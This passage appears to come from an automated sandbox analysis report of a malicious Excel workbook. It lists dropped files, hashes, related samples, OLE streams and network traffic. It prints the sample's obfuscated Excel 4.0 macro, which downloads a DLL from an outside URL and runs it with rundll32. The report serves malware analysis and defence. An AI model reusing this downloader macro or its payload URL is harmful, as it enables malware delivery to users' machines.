                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                document-1251000362.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                document-1251000362.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                catalogue-41.xlsbGet hashmaliciousBrowse
                • 108.167.180.111
                documents-1660683173.xlsmGet hashmaliciousBrowse
                • 192.185.56.250
                06iKnPFk8Y.dllGet hashmaliciousBrowse
                • 162.241.54.59
                06iKnPFk8Y.dllGet hashmaliciousBrowse
                • 162.241.54.59
                ddff.exeGet hashmaliciousBrowse
                • 108.179.235.108
                PowerShell_Input.ps1Get hashmaliciousBrowse
                • 162.241.61.203
                New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                • 192.185.122.118
                Purchase Order.9000.scan.pdf...exeGet hashmaliciousBrowse
                • 162.241.148.243
                document-1848152474.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                7z7Q51Y8Xd.dllGet hashmaliciousBrowse
                • 162.241.54.59
                pySsaGoiCT.dllGet hashmaliciousBrowse
                • 162.241.54.59
                QOpv1PykFc.dllGet hashmaliciousBrowse
                • 162.241.54.59

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\Users\user\sdbybsd.fdsSecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                  SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                    SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                      SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbxSecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                          SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                            SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                              SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:downloaded
                                Size (bytes):688241
                                Entropy (8bit):7.064532901692121
                                Encrypted:false
                                SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                                MD5:7DF0611CD75FA4C02B29070728C37247
                                SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                                SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                                SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                                Malicious:true
                                Antivirus:
                                • Antivirus: Virustotal, Detection: 22%, Browse
                                • Antivirus: Metadefender, Detection: 5%, Browse
                                • Antivirus: ReversingLabs, Detection: 2%
                                Joe Sandbox View:
                                • Filename: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls, Detection: malicious, Browse
                                • Filename: SecuriteInfo.com.Heur.19090.xls, Detection: malicious, Browse
                                • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                                • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                                Reputation:low
                                IE Cache URL:http://revolet-sa.com/files/countryyelow.php
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\FDCE0000
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):67965
                                Entropy (8bit):7.8795190850591
                                Encrypted:false
                                SSDEEP:1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70f:LqeRrW2JyW32AiHD2sTU2yF70f
                                MD5:ACD684D03FB00D3EDE4EF36D090E2892
                                SHA1:98C38FA7130CE3ADF7656D7C9E1410051C7DF775
                                SHA-256:007AD2692E7E4E40D9D9AACF2F68D1B7956DF881C8D0AF2B41569950BF2CA4ED
                                SHA-512:BFE2AD8D06CFCD31845728428CFF7F89748B8CF4A172872D0C85ACBE912A53858A3A90FB180EEDA81294821C029B1413DA9397F814889C2074368EDA35727EB8
                                Malicious:false
                                Reputation:low
                                Preview: .U[O.0.~........&M......i.....o....~..2......\l....xy.)Y<....U.R.f.........;)|..A..5.'.../...E_D..5iC.?(..E..2.u.i.S..[S.l.k...7...C...Y-...G......X.&..n]...P....(.U3...43.q(......A...O..e)..UD.5.....PH3os...q?..8.....nA......1..0Ir.|..CY..1T..3...$.9........4...|..i........V.:....R..<.#..kd...=W.....e..}U.Q...~./qC........L3..>l%.#..).tJ....Wp.M~.....>...d....{O4..@..6......{H?..;g......^:xB.6......>.!......uFL..G>.M.........PK..........!..r.............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                Process:C:\Windows\SysWOW64\rundll32.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2178
                                Entropy (8bit):6.992231725533755
                                Encrypted:false
                                SSDEEP:24:NKf5b6UkxAB8LRnbAwdZhE8/mHeYKf5b6UKjqA6YYUWG538Mhh5FB5tFId4UcP0z:Kb6UH8Ltk1Mm+Bb6UFAH6mBFBS4UcLuj
                                MD5:A9C113D8B90FCF3F0B90699048A6D136
                                SHA1:D3764B8EA6F98EE7B6768F32F9AC504B8F5397B5
                                SHA-256:239AD9A1493D03A978E94CE064598C68D4F82056886C0D403477B63317260AC9
                                SHA-512:FDFFE41FE43B9A4789053909A610C4AAE1F974E6D818D5D685D2CAA99BEE15F949089A25F4AB416381784F3B4625F145C99CA051188BB79593DAF8C9BBDAEB53
                                Malicious:false
                                Reputation:low
                                Preview: ........................................user.....................\...................user.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O...........gDJ....@.......,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ...[V.;....{C.+...h.P4.....B...r.............. .....(.U.!...].#HV.y.Z.i.i$..r'./....wN...!.......x.-....m.`....Fh..O.4..f.?.@'(n.p-.7..yV..1jBW....;...IZ......i..o}P....... e..Z....."....y*..>%.8r.msd.>.j.>...?bU..W...a0+.P5....*..\."..l.,>..t.....Z....\...I.2.....Nu.s.0......Il...2....P.....1....:..j..Pb.tQ.4....H..,.JV..z.[n.(#]=. vey.UP....V._..346...T.... w.((k...<..X......`N....6z....v....s}..!..L;.k.....~Z..Z..!p[A..7O..i..e.H.[>C.uE....:{.2..m.@...xG.T...Si_...s...H..`.xm.08........)t..S.........r..=.=)...ot............z..O...........gDJ....@...........E.x.p.o.r.t. .F.l.a.g....f...... ....l....\\...e...D.J..V.d.....a............ .....\l.S..
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 11:53:38 2021, atime=Wed Apr 7 11:53:38 2021, length=8192, window=hide
                                Category:dropped
                                Size (bytes):867
                                Entropy (8bit):4.475918729490231
                                Encrypted:false
                                SSDEEP:12:85QZ+cLgXg/XAlCPCHaXtB8XzB/RUvX+WnicvbwbDtZ3YilMMEpxRljKlcTdJP9O:85A+K/XTd6j0YegDv3qfrNru/
                                MD5:44C685D9F27C5D4389C82A76E63BE69C
                                SHA1:29408FEA1972853446414948D64054ECBCBA3D0E
                                SHA-256:BA1D65408DD9BA2B20995E2A49F823D7F4F968CA65B8D477F0531A9744881509
                                SHA-512:9298E13DC3CA5BAF93E20E631B1E903EDAE998891D1A9DB58BA96CE9F08032593E6EB03F01860477AC9B84CC0267770F42E07868E0E3439DD0BC2925A6F20CBE
                                Malicious:false
                                Reputation:low
                                Preview: L..................F...........7G..e2B..+..e2B..+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.f..Desktop.d......QK.X.R.f*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......305090..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Trojan.Agent.FFFK.8079.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 7 11:53:25 2021, mtime=Wed Apr 7 11:53:38 2021, atime=Wed Apr 7 11:53:38 2021, length=92160, window=hide
                                Category:dropped
                                Size (bytes):2318
                                Entropy (8bit):4.573810904271115
                                Encrypted:false
                                SSDEEP:48:8T/XT0jtH+NAHNfQh2T/XT0jtH+NAHNfQ/:8T/XojtcmfQh2T/XojtcmfQ/
                                MD5:7A6712A397C39A608B402FB08F51D055
                                SHA1:708B6D4ACCF27C74C2E2A541B14B95FC32FCF065
                                SHA-256:1CF0635DFA3533DBB3CA1CE8B5A5C80FDA4E0C2038049B36F1554FA851B12BD9
                                SHA-512:872C25D4E8D9FC1A7D020E2D379BA9C08B13C3ACAA49CC5A18C8E2DD1C4F21B572CA330D84BDF34A6AE4E4401A56A7CBF7609BF8F0C0B49527C0C2B531478730
                                Malicious:false
                                Reputation:low
                                Preview: L..................F.... ...H....+..e2B..+..g=U..+...h...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.f..Desktop.d......QK.X.R.f*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.f .SECURI~1.XLS.........R.f.R.f*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...T.r.o.j.a.n...A.g.e.n.t...F.F.F.K...8.0.7.9...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls.B.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...T.r.o.j.a.n...A.g.e.n.t...F.F.F.K...8.0.7.9...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):170
                                Entropy (8bit):4.888657403242958
                                Encrypted:false
                                SSDEEP:3:oyBVomM0b3kVsLBVouscb3kVsLBVomM0b3kVsLBVov:dj60gVsLBVVgVsLBV60gVsLBVy
                                MD5:77A0BBADB3E68BC0A632C215D9A38372
                                SHA1:D2F8B90CBAFB167744DF998488137E83FADB51F4
                                SHA-256:999982418F347FD2A25818225C5B61106CA2B8C16F3558C45251E4C228E75C9D
                                SHA-512:C32CCAA1D4E1E47813CEACD4F25C158A004917AD4B315AFB24CCD79A37A5E0E4A966560F36432B47184ADF869F86854E8C3A95F1F3FD1085B2EB1BBD953EAABF
                                Malicious:false
                                Reputation:low
                                Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Trojan.Agent.FFFK.8079.LNK=0..SecuriteInfo.com.Trojan.Agent.FFFK.8079.LNK=0..[xls]..SecuriteInfo.com.Trojan.Agent.FFFK.8079.LNK=0..
                                C:\Users\user\Desktop\BECE0000
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Applesoft BASIC program data, first line number 16
                                Category:dropped
                                Size (bytes):127008
                                Entropy (8bit):7.230390922283029
                                Encrypted:false
                                SSDEEP:3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSi2jTUqyF70Si2W2vXmwgvXmw3I8rmjo:G8rmjAItyzElBIL6lECbgBvP5NmuCShR
                                MD5:435860799AF28567EABD1AEC443E69B0
                                SHA1:D6950FED25AB8CEC5E1DAA1AF55F82CF1A6EBD58
                                SHA-256:54CBCFCA263513798A7D7C63CCFDAD67CDB987B966E6CFB22F26212AEDFFC814
                                SHA-512:9EA1B2DF35800E7B24DC09D18E2F91D9760641812FDBD72310F071503C2DA1F5B5F859315F3EA4B4BE06D9CBAFC77B3A7EB1E3AB0E9B6042FCD5D1D462332774
                                Malicious:false
                                Reputation:low
                                Preview: ........g2..........................\.p....user B.....a.........=.................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.........
                                C:\Users\user\sdbybsd.fds
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):688241
                                Entropy (8bit):7.064532901692121
                                Encrypted:false
                                SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                                MD5:7DF0611CD75FA4C02B29070728C37247
                                SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                                SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                                SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                                Malicious:true
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 5%, Browse
                                • Antivirus: ReversingLabs, Detection: 2%
                                Joe Sandbox View:
                                • Filename: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls, Detection: malicious, Browse
                                • Filename: SecuriteInfo.com.Heur.19090.xls, Detection: malicious, Browse
                                • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                                • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Apr 6 15:04:37 2021, Security: 0
                                Entropy (8bit):3.087349849990019
                                TrID:
                                • Microsoft Excel sheet (30009/1) 78.94%
                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                File name:SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls
                                File size:267776
                                MD5:a7c64329efaea29a2dc97ced238490f7
                                SHA1:5d4b9b386354444cf74fd858e3409f0294c45330
                                SHA256:8ee305eec94aaef24116983ceef933359fb860ab50787b7963c3f46fe751630c
                                SHA512:f7be46dad7af7216a65c5a58766eb20a2e847a787ddb19f9b6520d7e5c81836c8382911743ab13ad171145aadddaa1a43a05c93c5ba3b287d862cf3045bc1dbf
                                SSDEEP:6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0+:Fh+
                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                File Icon

                                Icon Hash:e4eea286a4b4bcb4

                                Static OLE Info

                                General

                                Document Type:OLE
                                Number of OLE Files:1

                                OLE File "SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls"

                                Indicators

                                Has Summary Info:True
                                Application Name:Microsoft Excel
                                Encrypted Document:False
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:True

                                Summary

                                Code Page:1251
                                Last Saved By:5
                                Create Time:2006-09-16 00:00:00
                                Last Saved Time:2021-04-06 14:04:37
                                Creating Application:Microsoft Excel
                                Security:0

                                Document Summary

                                Document Code Page:1251
                                Thumbnail Scaling Desired:False
                                Contains Dirty Links:False

                                Streams

                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                General
                                Stream Path:\x5DocumentSummaryInformation
                                File Type:data
                                Stream Size:4096
                                Entropy:0.348065102689
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00
                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                General
                                Stream Path:\x5SummaryInformation
                                File Type:data
                                Stream Size:4096
                                Entropy:0.24280443857
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                                Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780
                                General
                                Stream Path:Book
                                File Type:Applesoft BASIC program data, first line number 8
                                Stream Size:255780
                                Entropy:3.03349063455
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                                Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                Macro 4.0 Code

                                ,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
                                ,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
                                =HALT()

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Apr 7, 2021 05:54:07.267561913 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:07.429316044 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.429465055 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:07.430265903 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:07.591984034 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.883936882 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.883990049 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.884031057 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.884072065 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.884110928 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.884160995 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.884180069 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:07.884197950 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.884208918 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:07.884212017 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:07.884239912 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.884244919 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:07.884279966 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.884288073 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:07.884320021 CEST8049167192.232.249.186192.168.2.22
                                Apr 7, 2021 05:54:07.884332895 CEST4916780192.168.2.22192.232.249.186
                                Apr 7, 2021 05:54:07.884402037 CEST4916780192.168.2.22192.232.249.186
